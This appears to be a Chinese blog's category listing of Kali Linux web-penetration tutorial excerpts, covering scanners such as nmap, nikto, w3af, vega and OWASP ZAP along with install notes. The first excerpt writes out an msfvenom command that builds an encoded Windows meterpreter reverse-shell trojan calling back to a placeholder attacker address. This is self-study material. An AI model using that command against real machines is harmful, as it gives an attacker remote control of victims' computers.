网安—Kali的使用
文章平均质量分 53
主要为在网络安全方面的针对kali的使用。
胡乱huluan
此人并不懒,只是不想留下什么
展开
-
kali木马 简易木马制作与应用
Kali——木马(一)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 简易木马制作与应用 ——一.流程首先确定靶机和攻击主机可以连通利用msfvenom创建木马程序msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=xxx.xxx.xxx.xxx(攻击主机的ip) LPORT=xxx(攻击主机的端口) -f exe >p原创 2021-06-24 14:22:18 · 4913 阅读 · 1 评论 -
Kali更新升级 Python3.x
Kali——WEB渗透(九)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 更新升级:Python3.x——一.流程更新源vi /etc/apt/sources.list这个文件的更改需要root权限,确保拥有权限,如果没有权限,请输入:sudo vi /etc/apt/sources.list如果依然无权限,请更换用户,使用root管理员进行登录输入i键进行编辑,或者c键进行插入,具体操作命令点击查看VIM基本操作输入#阿里云原创 2021-06-21 14:38:43 · 4773 阅读 · 11 评论 -
Kali扫描 owasp_zap的使用
Kali——WEB渗透(八)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:OWASP_ZAP——一.使用(1).截断代理所有截断代理的结果都在左侧"Sites"中显示。代理侦听端口为8080。可以将每次扫描结果保存,在下一次打开QWASP_ZAP时可以再次打开这些会话。(2).更新插件图形化界面:工具栏“Manage ...原创 2019-08-01 22:51:07 · 1910 阅读 · 0 评论 -
Kali扫描 skipfish的使用
Kali——WEB渗透(五)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:Skipfish——skipfish:是一款由谷歌开发的实验性的主动WEB安全评估工具,使用C语言编写,体量小但是功能齐全。特点是:递归爬站,基于字典的探测,速度较快(多路单线程,启发式自动内容探测),误报相对较低。2.使用(1).格式:skipfis...原创 2019-07-22 22:32:21 · 2309 阅读 · 0 评论 -
Kali扫描 w3af的使用(一)用户界面和身份认证
Kali——WEB渗透(六)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:w3af(一)——本篇博客主要介绍w3af的用户界面和身份认证方式,w3af提供了4种身份认证方法和截断代理这一功能。安装w3af的具体教程点击安装教程即可。一.界面与使用命令行界面与图形化界面相互对应,功能完全相同。help:在命令行界面无论位于哪一...原创 2019-07-26 01:10:38 · 1397 阅读 · 0 评论 -
kali的vega安装流程
安装:由于kali不在提供vega,所以需要自己安装。可以去官网下载安装包,点击【vega官网】前往下载。但是在我写这篇博客的时候,vega的官网也不能下载了,所以我把安装包上传,大家共享,点击【安装包】下载。下载后,在命令行中进入存放压缩包的目录,输入命令unzip VegaBuild-linux.gtk.x86_64.zip(压缩包的名字) -d vega/安装后,输入命令 ./Veg...原创 2019-07-21 23:41:12 · 6680 阅读 · 15 评论 -
Kali扫描 vega的使用
Kali——WEB渗透(四)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:Vega——作用:爬站,处理表单,注入测试。是一款用java编写的开源web扫描器。使用:(1).安装,由于kali不在提供vega,所以需要自己安装。但是在我写这篇博客的时候,vega的官网也不能下载了,所以我把安装包上传,大家共享,点击【安装包】下...原创 2019-07-21 23:28:16 · 2798 阅读 · 0 评论 -
Kali扫描 arachni的安装与使用
Kali——WEB渗透(八)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:Arachni——一.安装下载网址: http://www.arachni-scanner.com/download/。在命令行中进入到压缩包所在位置,使用命令 tar xvf [file name](文件名)。安装成功后,打开“READER”,里面有we...原创 2019-07-29 23:11:14 · 1807 阅读 · 0 评论 -
Kali扫描 nikto的使用
Kali应用——WEB渗透(二)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— Nikto——作用:搜索存在安全漏洞(或隐患)的文件或者服务器漏洞。参数:-h/-host 域名或者IP或者文本文件:扫描该地址;(文本文件适用于扫描多个地址时使用,格式有三种,分别为:192.168.2.130【直接写IP地址,默认为80端口】,https...原创 2019-07-19 21:37:53 · 3398 阅读 · 1 评论 -
Kali侦查 nmap的使用
Kali——WEB渗透(三)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 侦查:Nmap——作用:用于扫描开放端口,协议号,操作系统信息,防火墙信息等的工具。流程:首先可以验证nmap安装是否正确,输入命令nmap --version。之后我们可以根据扫描的目标类别来使用不同的格式(1).单个目标,直接输入IP地址,例如nmap 1...原创 2019-07-19 12:40:15 · 1783 阅读 · 0 评论 -
Kali的w3af安装及创建快捷方式的【详细】教程
Kali安装w3af详细教程我为了安装个w3af花了10个小时,因为网上能参考的教程比较少,有些报错的解决方法甚至网上都没有,特意记录下来,以供大家参考。首先,由于kali2.0自带的w3af在扫描时会自动卡死,而且kali在2019.2发布的版本中去除了w3af,所以我们需要自己安装。我们需要准备以下三个环境:Git 客户端:安装命令 sudo apt-get install git...原创 2019-07-23 23:54:15 · 4187 阅读 · 0 评论 -
Kali扫描 w3af的使用(二)截断代理及其结果处理
Kali——WEB渗透(七)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— 扫描:w3af(二)——本篇博客主要介绍w3af的截断代理功能和对截断代理反馈信息的处理。一.截断代理简单来说,截断代理结束捕获目标站点用以身份验证的http头文件(Http header file),可以清楚地看到客户端和服务端之间的请求和应答数据。图形化界...原创 2019-07-28 23:49:31 · 386 阅读 · 0 评论 -
Kali侦查 httrack的使用
Kali应用——WEB渗透(二)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。—— HTTRACK——作用:减少与目标系统的交互(镜像复制网站)从而减少被发现的可能。具体流程:打开httrack输入本次工程的名字输入本次工程文件的储存位置侦查的链接或IP查找选项(一般情况下,采用1或者2模式)httrack可以选择查找特殊文...原创 2019-07-18 22:35:56 · 1502 阅读 · 0 评论